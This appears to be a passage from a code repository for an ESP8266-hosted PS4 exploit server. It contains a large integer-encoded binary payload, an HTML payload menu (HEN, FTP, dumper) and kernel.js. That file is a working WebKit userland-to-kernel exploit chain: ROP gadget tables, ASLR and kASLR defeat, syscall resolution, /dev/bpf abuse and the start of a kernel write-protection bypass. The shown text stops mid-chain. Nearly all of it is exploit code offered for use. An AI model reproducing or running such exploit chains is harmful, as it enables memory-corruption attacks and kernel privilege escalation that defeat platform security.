8,4290785544,1643285,3867756544,3812461896,3355443196,0,4219725824,3230007295,535303541,1207959556,385432973,3873964032,838860794,823651264,3709206464,2197815320,3732144184,369082417,6352,2202534027,3277525188,1338033992,3909091330,955,1358006600,2303250993,3224454654,152255,3904909568,928,1447150426,1413567809,3526447957,552371016,3351851333,18097220,1275068416,136602765,405030087,14,610045256,608487188,28,3224454400,1291684169,62841225,1207959552,369090441,6216,2248133251,3095924672,1207959552,136608907,4294966970,4286925055,10847247,369033216,6140,4294966714,3229960447,264603976,36484,3375449344,1287663941,2303254921,245442,2303197184,4178968543,2231369751,1209039296,369094537,6212,4294966458,1214311423,136594571,280761,1238511872,4148751497,3280554225,1960543560,898321464,6108,4293888332,1575701,3163375872,114468,4001975296,1103268168,3229996799,2336294773,3947373660,3296807183,1096,3956014920,4291527619,4293888328,1564437,1222281472,2300626051,1096637392,1096630620,1463927646,1430345281,1398101057,686588744,2311663941,1209803900,136604813,270812359,1,610045256,608487184,3604,3224454400,405030087,32,1240762697,2303317385,1221734862,79620489,1207959552,369090441,5920,2248133251,3213365184,1207959552,136608907,4294966970,4286925055,11305999,369033216,5844,4294966714,3229960447,264735049,38276,3375449344,1220555077,2303256969,310978,2303197184,3507879903,2231369750,1276148160,369098633,5916,4294966458,1231547391,3526440803,608471880,4143400968,1224378700,1064616069,142248776,273320776,2180589896,16712826,255918080,2055455124,255919416,2219163796,1276409025,259387705,607947081,443,1300842752,1208675072,4282970625,834464712,4287188187,381031935,4219666432,2211584257,2202598370,3498649796,1547787611,1581342017,1103322945,1431585109,3968026707,4052306008,1221822792,2370365065,1091052628,2951282057,2315255806,4291331013,2121854341,610569548,3934864400,1223133516,339490189,3224436736,281248584,373167615,3526426624,3202845004,2,4294458600,3297329663,4294966968,3833939455,2202551416,678690875,838366091,872630482,3884532772,549684040,4294463720,3897789439,1223133508,3907023755,4294965241,3538666889,3907488068,4294965253,3984965681,369035385,5552,2202534027,1566267588,1564564545,33537731,1213267968,331955597,4276617216,2248146935,824146112,1221734857,330642829,2370306048,1292349,4158121984,4173463551,4276126495,3224441067,359011839,948109312,2211738641,3277520840,898451539,5132,15499592,3103784961,64,4092037448,1032669349,4992,4294743528,2210630143,3682992072,3224445304,4294935784,3099757055,4294967294,259379845,3202517320,16695296,3102269321,1224736766,16827521,3277520896,1237332296,84920969,1220739442,351354243,1946157056,369053720,5352,1208519001,4294951111,3343450111,4294967234,3375481855,835858768,1032669430,4895,1170813253,369082417,5324,361580633,5260,708152648,2298478611,4225690055,65535,1329677360,1346459980,4064,0,3744,0,2665,0,956664648,1207959574,2236088459,958035136,1208578872,9470091,4008378368,2336754038,34944,1977871104,1463927777,1430345281,1398101057,686588744,1241352521,2302801545,3431549399,747325541,37,1552762880,347737124,1207959552,4130463625,379459071,2302935040,1208755324,1275362189,280688265,4278190080,1480469,898320384,5592,837781832,1561722834,1275068438,2303256969,3884535006,2144321,347734016,4278190080,1454869,898320384,5548,4293888328,1452821,3296937984,1096637224,1096630620,3277799774,2236137521,1209365759,360056203,2336751616,3229960192,994575988,4067762296,1213420995,1209592963,136608905,747325541,37,898320384,5468,2303250993,3776315375,1275068437,136596619,8435777,2370306048,620301,9484800,2370371584,2303201401,2769682430,1207959573,354825611,2303197184,2311095791,170244291,1158643727,2568355800,1207959573,2300101763,3277675480,2303218517,2336772605,3677423743,4294927336,3229960447,2336752756,2303201368,4111859695,2231369748,2198238656,1946158205,3682945051,998315636,512,2370309749,1323836539,2315255807,3224437829,3277675354,1447122753,1413567809,2169000789,96492,4236855552,747326565,37,3239444224,2231369748,822572480,23194093,2202075136,21767356,2298478592,1350897605,1275068417,136606861,280688177,1275068416,369096585,5392,608472393,1821198368,2303203364,1208493124,1881431181,608487240,65552,1224093952,280686473,1275068416,673479821,350098943,2303197184,823665756,1153911030,16785444,1220149248,1275068416,369098633,5312,1493536072,1207959562,336213387,2303197184,1212687428,163972493,3526426624,608471368,93145168,2360,608471368,93145176,2220,608471368,93145184,2080,608471368,4018752616,341448191,2303197184,4203302127,4294347084,1321749,898320384,5044,2314176844,823525317,2231369748,3128456685,32,1289652552,369092489,5196,2370369073,971581,622198528,822083604,3261810898,227362852,3840,81027,2370311029,971549,3271641088,18891719,3942645760,3271510027,553288520,3677475701,2503839048,4278190094,1302293,3682945024,4272522255,549126143,1275068416,2303256201,3843424223,1207959571,24691841,3901292544,1547787611,1581342017,1103322945,1096171863,1431585109,3968026707,3548989472,608482831,4253632856,1223985481,2370620809,940861,4130424064,152436560,822083603,1032669430,3624,337921161,326505983,1515716608,545227585,3123147776,32,1289652552,369098633,4972,1975551304,3463137553,93145124,3604,138186060,4282978539,3347270086,4270016804,1170568480,2370371377,907069,555089664,1090519059,3892346251,4294966312,1107264845,1220908303,963952773,1961722949,1217218612,113160,2303197184,3750316270,608471368,4230539272,2336817151,3121095748,16,1832226120,1207959558,4280842381,1241877,1015759104,4225427492,2236153855,3297331648,2219126900,3123410157,2,1223592264,2370363273,3823634504,1241513979,673479821,4282,898451456,1576,313660927,1149960192,2202534948,1566251204,1564564545,1598119489,1431585219,529221715,1224509769,2215631749,185,11076491,251662336,41092,417906944,1946351747,167281418,2397654900,2332033024,1441278075,1224736763,2303246469,1216246981,3123214477,16,3174403400,4278190085,1195797,3229960192,2202559349,3526428869,1395850,1221626184,4148740863,4202907864,55347232,3957945671,1081838398,4294642664,3229960447,1959102792,2022524980,1096232,2370306048,357173,4111859456,1207959569,427147397,141921608,1081838920,8378,3843424000,2164260881,4026531619,2609596671,144,4294917865,2303482879,1547787751,287712767,1430323200,1213551681,1364458889,142576456,1709759281,1224736763,74760325,274238280,4293888328,1111829,1103136000,108381321,294275,2236108404,1716090075,38828931,2370585205,155819,4018752512,4294658280,1975551487,10533423,2303459328,3750316270,4293144901,1138453,3146598400,160,221370,4294324480,1129237,71681792,0,3767092314,1547787611,834886977,4286924992,2336757108,1073925,9127936,1958774088,2017150982,3287446816,1222324563,1209068675,594870149,1963081603,1955416094,369035300,4232,259375237,608471880,1222324488,17332355,1220776975,2299577475,1103322072,1213420884,2169044361,41196,20939520,1976338761,4135929868,2236431732,3945559524,609519926,881412108,4288342052,2336817151,3229951028,203707531,2303515509,4018751713,270407167,938016768,1207959553,1978199945,2248146943,3138024896,22,61673,1955416064,2303201316,4246077423,2231369743,264473024,55429,4557568,1963063427,1435191311,3531950136,11502607,1810563072,251852931,48261,1972062208,1320619832,1186402060,1368213528,3770763488,3257485317,1073382216,10651151,3800039424,2575634191,1207959552,537285773,1959953736,1186402160,2223851534,4294901761,3321972991,2285797704,1962934272,3330492438,2089633800,2293897252,4278190080,1043221,2335042304,1030099010,1081474560,612142408,8960536,2370306048,425781,3373661952,1207959567,270812299,1207995208,405030025,611618120,8960536,2303459328,2836791271,3942645775,244500,233504768,2204507511,3094610680,11707,3956836608,4292721453,4125884415,4294958011,1726934015,1962807357,406677147,1222473214,405044365,35002,898451456,1396,2169017323,41156,1096637184,1463927644,1430345281,1398101057,686588744,1224640841,405044365,248649215,2202075136,494141758,3908536652,4294966800,292929669,4294412620,956181,3230220544,44521,1183531264,178696,2337013760,935725,898320384,3664,2302577477,1158161476,207992591,1169624897,3288416526,1223451465,369094537,3824,833601,2236088320,3280554176,2336843892,2303211638,3750316266,247600639,2336817152,2303211646,4001975530,246552063,3342925824,518,4152970240,140937541,236328447,2336817152,2303211646,3733539050,203703433,243930623,1149960192,2303002660,898320446,3532,1105168712,4278732425,947989,1149977600,2202536996,1146824900,1096663177,1096630620,3277799774,3850979413,3968026707,1166755864,4220078080,12094280,1224736767,427097989,3763702088,3900016968,4294775784,1972062463,1220576744,1977636235,3296937999,3750316056,637492571,3492,279239,1207959552,823706755,3277675456,1447122753,1413567809,2202555221,2336762092,2236436550,1720405238,2089371656,2337017892,2303219822,2123056371,1149847620,1854605348,3313766216,1090519040,1208041091,405034121,2303465076,4238272759,3230007295,2336754293,3910673492,164,1172801868,1760093233,1224736764,74760325,274762572,612141896,4233488392,4130471935,1958774088,1888176132,4130424080,1961723213,4018752529,4294720232,3229960447,2337014900,2236420208,1215919332,1953822341,1223525709,223743371,2500788224,1815694530,2500790308,1153598656,812972169,1962902853,12402987,1207959616,692438529,3884535037,1290766661,3523213961,2370562697,692332348,4136193258,219551231,686489600,21555849,3884534982,485216767,612141896,3296938000,3733538856,1547787611,1581342017,637493057,3196,279495,1207959552,1529398403,1096663089,1096630620,3277799774,1564314952,4278190087,812837,1221734656,66467213,2370306048,476989,369053696,3160,826628417,1221145024,4291696013,2370371583,254517,4294914304,803621,0,1162559814,1162559814,1162559814,1162559814,2368127638,2333877865,4285217566,307159087,2126017525,2273089628,2933584231,2873883040,1691277431,2790244714,3433740699,1067714934,1660287673,1236798084,3298746114,1456682778,359572493,2376078599,546479511,2999145027,4090755069,1328063081,1082158946,511720287,2332899422,1482074198,3933198808,373303826,658369985,2539888662,3428137313,150603146,1448475944,90543153,1817695207,191306765,946287949,993956028,4072434858,3527778027,986328841,2905997980,2997993774,1797225581,543330209,913102476,2656328406,631810352,1041404989,4028306957,3765584518,1748606166,2524975579,1097935640,401111112,520125835,1976723478,4074812823,2893352045,2983581974,3504901045,1629464511,1761085531,3167875303,1438605369,807435420,1143492840,710004226,4259009573,2593604998,3824162590,303010469,2790022186,3900690341,442889051,3113996232,1569769770,4140763348,4233779715,299611806,1648222957,1569258689,758230167,1890391491,1520483845,1151087846,4276431736,1758746168,3869512579,2879181562,274696620,74413455,3166285500,4198636983,3021968462,1805395722,3956459435,693256743,1076217921,1833492564,2222424099,614166349,1797979729,2661384232,3390598589,2040429965,3954761818,3656596945,2804584450,2728033973,2820747223,2710338896,2545889169,3250754238,520915981,355807710,2546765881,159329863,3466380265,1489547921,493938806,3863633778,2485270186,3012580038,4025523103,3277033047,3620286691,2030844592,3567818523,2966561409,8217218,3349038936,1706354733,1786250686,1523134857,3243302468,1050541511,1075266081,1103755641,265813185,3802363444,542776256,1378856719,1916044237,856863663,2954898465,2972557510,2963792729,1531714638,1352274015,2038877208,34668325,2835583119,485669431,1158269971,1951774741,69478410,3014334929,4172694730,1915400509,2263102856,138892651,1772820005,4277583645,2,822083584,0,0,65280,0,0,0,0,0,1073741824,805318656,0,1073741824,0,8388608,4294918144,4026531840,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,822083584,0,536871808,65280,0,0,0,0,0,1073741824,1073758208,0,1073741824,2,8388608,4294918144,4026531840,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1701536102,2036689759,1869373299,1929407331,1685353832,1601075055,1600483952,1668184435,0,0,0,0,0,0,6419023,0,1611,0,6420854,0,2010,0,6423961,0,2010,0,6437050,0,2264,0,6440161,0,2348,0,6479616,0,368,0,6483166,0,1386,0,6320197,0,444,0,6320353,0,444,0,6937418,0,863,0,6937560,0,863,0,6938084,0,1169,0,6939276,0,1169,0,6939880,0,1169,0,6940765,0,1169,0,6941822,0,1169,0,6942477,0,1169,0,6943314,0,1169,0,0,0,0,0,0,0,0,0,4159312,0,5952,0,4159792,0,5944,0,1353392,0,5936,0,2370144,0,5928,0,3156944,0,5920,0,3734064,0,5912,0,3734464,0,5904,0,365952,0,5896,0,366208,0,5888,0,2972752,0,5880,0,1550064,0,5872,0,4125184,0,5864,0,3971056,0,5856,0,3733760,0,5848,0,3733872,0,5840,0,6430752,0,5832,0,6343184,0,5776,0,6375104,0,5824,0,6319616,0,5784,0,6350464,0,5768,0,6446160,0,5808,0,6446256,0,5800,0,6448272,0,5816,0,6352896,0,5792,0,26819376,0,5760,0,38915264,0,5752,0,21435496,0,5744,0,38903248,0,5736,0,39013856,0,5728,0,0,0,0,0,4544,1701147238,1931804672,168430090,657930,1801611628,1701737061,1886596716,1811970162,1701536361,1818586738,1650816863,1919972142,1768685688,1919249250,1600939374,779319667,2020765811,1700749056,1919906418,1701016320,1852990795,1867279461,1951622241,1299477089,1819632751,2037579877,1819566963,1651076096,1281712979,1231250025,1919251566,778854766,2020765811,1818324224,6516588,1701147238,1835363584,7628147,1668113773,1929410928,1668182644,1929408621,1852404336,1929406068,1701606004,1966014574,1952539760,1397763941,1146115380,776295489,5264720,1685091631,795178081,1429492560,1413563472,1431318085,1701719632,1702112884,1459646573,1868786789,1948280173,1397760111,1313163316,774993440,1831796788,1882158190,795045746,1831822373,788557157,796159597,1668248176,1869770752,7562851,1399153491,1819043176,1701998403,2428514560,788566160,1953724787,1664052581,1869442415,1768697710,1768697698,1701008226,1433631059,778856820,2020765811,1701016320,1433631059,1399613812,1399090789,1702130553,1953451629,1667851881,1869182049,1953060718,2019906664,116,0,0,0,0,0,0,1345211,0,639638617,9,5,0,0,0,7230011,0,639638617,9,5,0,0,0,8727659,0,639638617,9,5,0,0,0,1345255,0,639638617,9,5,0,0,0,7230055,0,639638617,9,5,0,0,0,8727703,0,639638617,9,5,0,0,0,13897512,0,639638312,9,5,0,0,0,0,0,0,0,0,0];
2 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/index.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE HTML>
 2 | <html>
 3 | <link rel="icon" type="image/png" href="/ps4icon.png"/><title>ESP8266 PS4 Exploit Server</title></head>
 4 | <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"/>
 5 | <center>
 6 | <style>button{border:0;border-radius:0.3rem;background-color:#1fa3ec;color:#fff;line-height:2.4rem;font-size:1.2rem;width:80%;}</style>
 7 | <font size="10">ESPS4 Exploit Server</font><br />
 8 | <hr>
 9 | <font size="6">VTX PAYLOADS</font><br />
10 | <a href="/henindex.html"><button>HEN</button></a><br /><br />
11 | <a href="/ftpindex.html"><button>FTP</button></a><br /><br />
12 | <a href="/dumperindex.html"><button>DUMPER</button></a><br />
13 | 
14 | <hr>
15 | <font size="6">Settings</font><br />
16 | <a href="/settings"><button>Edit Wifi/Payload Settings.ini</button></a><br />
17 | <hr>
18 | <font size="6">Run Payload Selected in Settings.ini</font>
19 | <a href="/payloadbin.html"><button>Run Payload</button></a><br />
20 | <br />
21 | <font size="6">FTP SERVER RUNNING AT:
22 | <script type="text/javascript">
23 |     var ip = location.host;
24 |     document.write(ip);
25 | </script>
26 | </font>
27 | 
28 | </center>
29 | </html>
30 | 


--------------------------------------------------------------------------------
/PS4Exploit/data/kernel.js:
--------------------------------------------------------------------------------
  1 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  2 | // CODE EXECUTION (STILL USERLAND) ///////////////////////////////////////////////////////////////////////////////////
  3 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  4 | var p;
  5 | 
  6 | var deref_stub_jmp = function(addr) {
  7 |   var z = p.read4(addr) & 0xFFFF;
  8 |   var y = p.read4(addr.add32(2));
  9 | 
 10 |   if (z != 0x25FF) return 0;
 11 |   
 12 |   return addr.add32(y + 6);
 13 | }
 14 | 
 15 | var gadgets;
 16 | 
 17 | /*
 18 | kchain.push(window.gadgets["pop rax"]);
 19 |       kchain.push(savectx.add32(0x30));
 20 |       kchain.push(window.gadgets["mov rax, [rax]"]);
 21 |       kchain.push(window.gadgets["pop rcx"]);
 22 |       kchain.push(kernel_slide);
 23 |       kchain.push(window.gadgets["add rax, rcx"]);
 24 |       kchain.push(window.gadgets["pop rdi"]);
 25 |       kchain.push(savectx.add32(0x50));
 26 |       kchain.push(window.gadgets["mov [rdi], rax"]);
 27 |       */
 28 | gadgets = {
 29 |   "ret":                    0x0000003C,
 30 |   "jmp rax":                0x00000082,
 31 |   "ep":                     0x000000AD,
 32 |   "pop rbp":                0x000000B6,
 33 |   "mov [rdi], rax":         0x00003FBA,
 34 |   "pop r8":                 0x0000CC42,
 35 |   "pop rax":                0x0000CC43,
 36 |   "mov rax, rdi":           0x0000E84E,
 37 |   "mov rax, [rax]":         0x000130A3,
 38 |   "mov rdi, rax; jmp rcx":  0x0003447A,
 39 |   "pop rsi":                0x0007B1EE,
 40 |   "pop rdi":                0x0007B23D,
 41 |   "add rsi, rcx; jmp rsi":  0x001FA5D4,
 42 |   "pop rcx":                0x00271DE3,
 43 |   "pop rsp":                0x0027A450,
 44 |   "mov [rdi], rsi":         0x0039CF70,
 45 |   "mov [rax], rsi":         0x003D0877,
 46 |   "add rsi, rax; jmp rsi":  0x004E040C,
 47 |   "pop rdx":                0x00565838,
 48 |   "pop r9":                 0x0078BA1F,
 49 |   "add rax, rcx":           0x0084D04D,
 50 |   "jop":                    0x01277350,
 51 |   "infloop":                0x012C4009,
 52 | 
 53 |   "stack_chk_fail":         0x000000C8,
 54 |   "memcpy":                 0x000000F8,
 55 |   "setjmp":                 0x00001468
 56 | };
 57 | 
 58 | var reenter_help = { length:
 59 |     { valueOf: function(){
 60 |         return 0;
 61 |     }
 62 | }};
 63 | 
 64 | var postExploit = function() {
 65 |   p=window.primitives;
 66 | 
 67 |   p.leakfunc = function(func)
 68 |   {
 69 |     var fptr_store = p.leakval(func);
 70 |     return (p.read8(fptr_store.add32(0x18))).add32(0x40);
 71 |   }
 72 | 
 73 |   try {
 74 |     // Leak address of parseFloat()
 75 |     var parseFloatStore = p.leakfunc(parseFloat);
 76 |     var parseFloatPtr = p.read8(parseFloatStore);
 77 | 
 78 |     // Defeat ASLR
 79 |     // Get webkit module address
 80 |     var webKitBase  = p.read8(parseFloatStore);
 81 |     webKitBase.low &= 0xffffc000;
 82 |     webKitBase.sub32inplace(0xe8c000);
 83 | 
 84 |     window.moduleBaseWebKit = webKitBase;
 85 | 
 86 |     var offsetToWebKit = function(off) {
 87 |       return window.moduleBaseWebKit.add32(off)
 88 |     }
 89 | 
 90 |     // Set gadgets to proper addresses
 91 |     for(var gadget in gadgets) {
 92 |       gadgets[gadget] = offsetToWebKit(gadgets[gadget]);
 93 |     }
 94 | 
 95 |     // Get libkernel module address
 96 |     var libKernelBase  = p.read8(deref_stub_jmp(gadgets['stack_chk_fail']));
 97 |     libKernelBase.low &= 0xffffc000;
 98 |     libKernelBase.sub32inplace(0xc000);
 99 | 
100 |     window.moduleBaseLibKernel = libKernelBase;
101 | 
102 |     var offsetToLibKernel = function(off) {
103 |       return window.moduleBaseLibKernel.add32(off);
104 |     }
105 | 
106 |     // Get libc module address
107 |     var libSceLibcBase = p.read8(deref_stub_jmp(offsetToWebKit(0x228)));
108 |     libSceLibcBase.low &= 0xffffc000;
109 | 
110 |     window.moduleBaseLibc = libSceLibcBase;
111 | 
112 |     var offsetToLibc = function(off) {
113 |       return window.moduleBaseLibc.add32(off);
114 |     }
115 | 
116 |     // Setup ROP launching
117 |     var hold1;
118 |     var hold2;
119 |     var holdz;
120 |     var holdz1;
121 | 
122 |     while (1) {
123 |       hold1 = {a:0, b:0, c:0, d:0};
124 |       hold2 = {a:0, b:0, c:0, d:0};
125 |       holdz1 = p.leakval(hold2);
126 |       holdz = p.leakval(hold1);
127 |       if (holdz.low - 0x30 == holdz1.low) break;
128 |     }
129 | 
130 |     var pushframe = [];
131 |     pushframe.length = 0x80;
132 |     var funcbuf;
133 | 
134 |     var launch_chain = function(chain)
135 |     {
136 |       var stackPointer = 0;
137 |       var stackCookie = 0;
138 |       var orig_reenter_rip = 0;
139 |       
140 |       var reenter_help = {length: {valueOf: function(){
141 |         orig_reenter_rip = p.read8(stackPointer);
142 |         stackCookie = p.read8(stackPointer.add32(8));
143 |         var returnToFrame = stackPointer;
144 |         
145 |         var ocnt = chain.count;
146 |         chain.push_write8(stackPointer, orig_reenter_rip);
147 |         chain.push_write8(stackPointer.add32(8), stackCookie);
148 |         
149 |         if (chain.runtime) returnToFrame=chain.runtime(stackPointer);
150 |         
151 |         chain.push(gadgets["pop rsp"]); // pop rsp
152 |         chain.push(returnToFrame); // -> back to the trap life
153 |         chain.count = ocnt;
154 |         
155 |         p.write8(stackPointer, (gadgets["pop rsp"])); // pop rsp
156 |         p.write8(stackPointer.add32(8), chain.stackBase); // -> rop frame
157 |       }}};
158 |       
159 |       var funcbuf32 = new Uint32Array(0x100);
160 |       nogc.push(funcbuf32);
161 |       funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10));
162 |       
163 |       p.write8(funcbuf.add32(0x30), gadgets["setjmp"]);
164 |       p.write8(funcbuf.add32(0x80), gadgets["jop"]);
165 |       p.write8(funcbuf,funcbuf);
166 |       p.write8(parseFloatStore, gadgets["jop"]);
167 |       var orig_hold = p.read8(holdz1);
168 |       var orig_hold48 = p.read8(holdz1.add32(0x48));
169 |       
170 |       p.write8(holdz1, funcbuf.add32(0x50));
171 |       p.write8(holdz1.add32(0x48), funcbuf);
172 |       parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);
173 |       p.write8(holdz1, orig_hold);
174 |       p.write8(holdz1.add32(0x48), orig_hold48);
175 |       
176 |       stackPointer = p.read8(funcbuf.add32(0x10));
177 |       stackCookie = p.read8(stackPointer.add32(8));
178 |       rtv=Array.prototype.splice.apply(reenter_help);
179 |       return p.leakval(rtv);
180 |     }
181 | 
182 |     p.loadchain = launch_chain;
183 | 
184 |     // Dynamically resolve syscall wrappers from libkernel
185 |     var kview = new Uint8Array(0x1000);
186 |     var kstr = p.leakval(kview).add32(0x10);
187 |     var orig_kview_buf = p.read8(kstr);
188 |     
189 |     p.write8(kstr, window.moduleBaseLibKernel);
190 |     p.write4(kstr.add32(8), 0x40000);
191 | 
192 |     var countbytes;
193 |     for (var i=0; i < 0x40000; i++)
194 |     {
195 |         if (kview[i] == 0x72 && kview[i+1] == 0x64 && kview[i+2] == 0x6c && kview[i+3] == 0x6f && kview[i+4] == 0x63)
196 |         {
197 |             countbytes = i;
198 |             break;
199 |         }
200 |     }
201 |     p.write4(kstr.add32(8), countbytes + 32);
202 |     
203 |     var dview32 = new Uint32Array(1);
204 |     var dview8 = new Uint8Array(dview32.buffer);
205 |     for (var i=0; i < countbytes; i++)
206 |     {
207 |         if (kview[i] == 0x48 && kview[i+1] == 0xc7 && kview[i+2] == 0xc0 && kview[i+7] == 0x49 && kview[i+8] == 0x89 && kview[i+9] == 0xca && kview[i+10] == 0x0f && kview[i+11] == 0x05)
208 |         {
209 |             dview8[0] = kview[i+3];
210 |             dview8[1] = kview[i+4];
211 |             dview8[2] = kview[i+5];
212 |             dview8[3] = kview[i+6];
213 |             var syscallno = dview32[0];
214 |             window.syscalls[syscallno] = window.moduleBaseLibKernel.add32(i);
215 |         }
216 |     }
217 | 
218 |     // Setup helpful primitives for calling and string operations
219 |     var chain = new window.rop();
220 | 
221 |     p.fcall = function(rip, rdi, rsi, rdx, rcx, r8, r9) {
222 |       chain.clear();
223 |       
224 |       chain.notimes = this.next_notime;
225 |       this.next_notime = 1;
226 | 
227 |       chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9);
228 |       
229 |       chain.push(window.gadgets["pop rdi"]); // pop rdi
230 |       chain.push(chain.stackBase.add32(0x3ff8)); // where
231 |       chain.push(window.gadgets["mov [rdi], rax"]); // rdi = rax
232 |       
233 |       chain.push(window.gadgets["pop rax"]); // pop rax
234 |       chain.push(p.leakval(0x41414242)); // where
235 |       
236 |       if (chain.run().low != 0x41414242) throw new Error("unexpected rop behaviour");
237 |       
238 |       return p.read8(chain.stackBase.add32(0x3ff8));
239 |     }
240 | 
241 |     p.syscall = function(sysc, rdi, rsi, rdx, rcx, r8, r9) {
242 |       if (typeof sysc == "string") {
243 |         sysc = window.syscallnames[sysc];
244 |       }
245 | 
246 |       if (typeof sysc != "number") {
247 |         throw new Error("invalid syscall");
248 |       }
249 |       
250 |       var off = window.syscalls[sysc];
251 | 
252 |       if (off == undefined) {
253 |         throw new Error("invalid syscall");
254 |       }
255 |       
256 |       return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);
257 |     }
258 | 
259 |     p.writeString = function (addr, str)
260 |     {
261 |       for (var i = 0; i < str.length; i++)
262 |       {
263 |         var byte = p.read4(addr.add32(i));
264 |         byte &= 0xFFFF0000;
265 |         byte |= str.charCodeAt(i);
266 |         p.write4(addr.add32(i), byte);
267 |       }
268 |     }
269 | 
270 |     p.readString = function(addr)
271 |     {
272 |       var byte = p.read4(addr);
273 |       var str  = "";
274 |       while (byte & 0xFF)
275 |       {
276 |         str += String.fromCharCode(byte & 0xFF);
277 |         addr.add32inplace(1);
278 |         byte = p.read4(addr);
279 |       }
280 |       return str;
281 |     }
282 | 
283 |     var spawnthread = function (chain) {
284 |       var longjmp       = offsetToWebKit(0x1458);
285 |       var createThread  = offsetToWebKit(0x116ED40);
286 | 
287 |       var contextp = mallocu32(0x2000);
288 |       var contextz = contextp.backing;
289 |       contextz[0] = 1337;
290 |       p.syscall(324, 1);
291 | 
292 |       var thread2 = new window.rop();
293 | 
294 |       thread2.clear();
295 |       thread2.push(window.gadgets["ret"]); // nop
296 |       thread2.push(window.gadgets["ret"]); // nop
297 |       thread2.push(window.gadgets["ret"]); // nop
298 | 
299 |       thread2.push(window.gadgets["ret"]); // nop
300 |       chain(thread2);
301 | 
302 |       p.write8(contextp, window.gadgets["ret"]); // rip -> ret gadget
303 |       p.write8(contextp.add32(0x10), thread2.stackBase); // rsp
304 | 
305 |       var test = p.fcall(createThread, longjmp, contextp, stringify("GottaGoFast"));
306 | 
307 |       window.nogc.push(contextz);
308 |       window.nogc.push(thread2);
309 | 
310 |       return thread2;
311 |     }
312 | 
313 |     var run_count = 0;
314 | 
315 |     function kernel_rop_run(fd, scratch) {
316 |       // wait for it
317 |       while (1) {
318 |         var ret = p.syscall("sys_write", fd, scratch, 0x200);
319 |         run_count++;
320 |         if (ret.low == 0x200) {
321 |             return ret;
322 |         }
323 |       }
324 |     }
325 | 
326 |     // Clear errno
327 |     p.write8(offsetToLibKernel(0x7CCF0), 0);
328 | 
329 |     //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
330 |     // KERNEL EXPLOIT BEGINS /////////////////////////////////////////////////////////////////////////////////////////////
331 |     //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
332 | 
333 |     //alert("OHHH WE'RE HALFWAY THERE WOOOOOOAHHH LIVIN ON A PRAYER")
334 | 
335 |     var test = p.syscall("sys_setuid", 0);
336 | 
337 |     // Check if homebrew has already been enabled, if not, run kernel exploit :D
338 |     if(test != '0') {
339 |       /////////////////// STAGE 1: Setting Up Programs ///////////////////
340 | 
341 |       var spadp = mallocu32(0x2000);
342 | 
343 |       // Open first device and bind
344 |       var fd1 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR
345 | 
346 |       if(fd1 < 0) {
347 |         throw "Failed to open first /dev/bpf device!";
348 |       }
349 |       
350 |       p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF
351 | 
352 |       if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
353 |         p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("wlan0"));
354 | 
355 |         if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
356 |           throw "Failed to bind to first /dev/bpf device!";
357 |         }
358 |       }
359 | 
360 |       // Open second device and bind
361 |       var fd2 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR
362 | 
363 |       if(fd2 < 0) {
364 |         throw "Failed to open second /dev/bpf device!";
365 |       }
366 | 
367 |       p.syscall("sys_ioctl", fd2, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF
368 | 
369 |       if (p.syscall("sys_write", fd2, spadp, 40).low == (-1 >>> 0)) {
370 |         p.syscall("sys_ioctl", fd2, 0x8020426C, stringify("wlan0"));
371 | 
372 |         if (p.syscall("sys_write", fd2, spadp, 40).low == (-1 >>> 0)) {
373 |           throw "Failed to bind to second /dev/bpf device!";
374 |         }
375 |       }
376 | 
377 |       // Setup kchain stack for kernel ROP chain
378 |       var kchainstack = malloc(0x2000);
379 |       
380 |       /////////////////// STAGE 2: Building Kernel ROP Chain ///////////////////
381 |       var kchain  = new krop(p, kchainstack);
382 |       var savectx = malloc(0x200);
383 | 
384 |       // NOP Sled
385 |       kchain.push(window.gadgets["ret"]);
386 |       kchain.push(window.gadgets["ret"]);
387 |       kchain.push(window.gadgets["ret"]);
388 |       kchain.push(window.gadgets["ret"]);
389 |       kchain.push(window.gadgets["ret"]);
390 |       kchain.push(window.gadgets["ret"]);
391 |       kchain.push(window.gadgets["ret"]);
392 |       kchain.push(window.gadgets["ret"]);
393 | 
394 |       // Save context to exit back to userland when finished
395 |       kchain.push(window.gadgets["pop rdi"]);
396 |       kchain.push(savectx);
397 |       kchain.push(offsetToLibc(0x1D3C));
398 | 
399 |       // Defeat kASLR (resolve kernel .text base)
400 |       var kernel_slide = new int64(-0x2610AD0, -1);
401 |       kchain.push(window.gadgets["pop rax"]);
402 |       kchain.push(savectx.add32(0x30));
403 |       kchain.push(window.gadgets["mov rax, [rax]"]);
404 |       kchain.push(window.gadgets["pop rcx"]);
405 |       kchain.push(kernel_slide);
406 |       kchain.push(window.gadgets["add rax, rcx"]);
407 |       kchain.push(window.gadgets["pop rdi"]);
408 |       kchain.push(savectx.add32(0x50));
409 |       kchain.push(window.gadgets["mov [rdi], rax"]);
410 |         
411 |       // Disable kernel write protection
412 |       kchain.push(window.gadgets["pop rax"])
413 |       kchain.push(savectx.add32(0x50));
414 |       kchain.push(window.gadgets["mov rax, [rax]"]);
415 |       kchain.push(window.gadgets["pop rcx"]);
416 |       kchain.push(0x280f79);
417 |       kchain.push(window.gadgets["add rax, rcx"]);
418 |       kchain.push(offsetToWebKit(0x12a16)); // mov rdx, rax
419 |       kchain.push(window.gadgets["pop rax"]);
420 |       kchain.push(0x80040033);
421 |       kchain.push(offsetToWebKit(0x1517c7)); // jmp rdx
422 | 
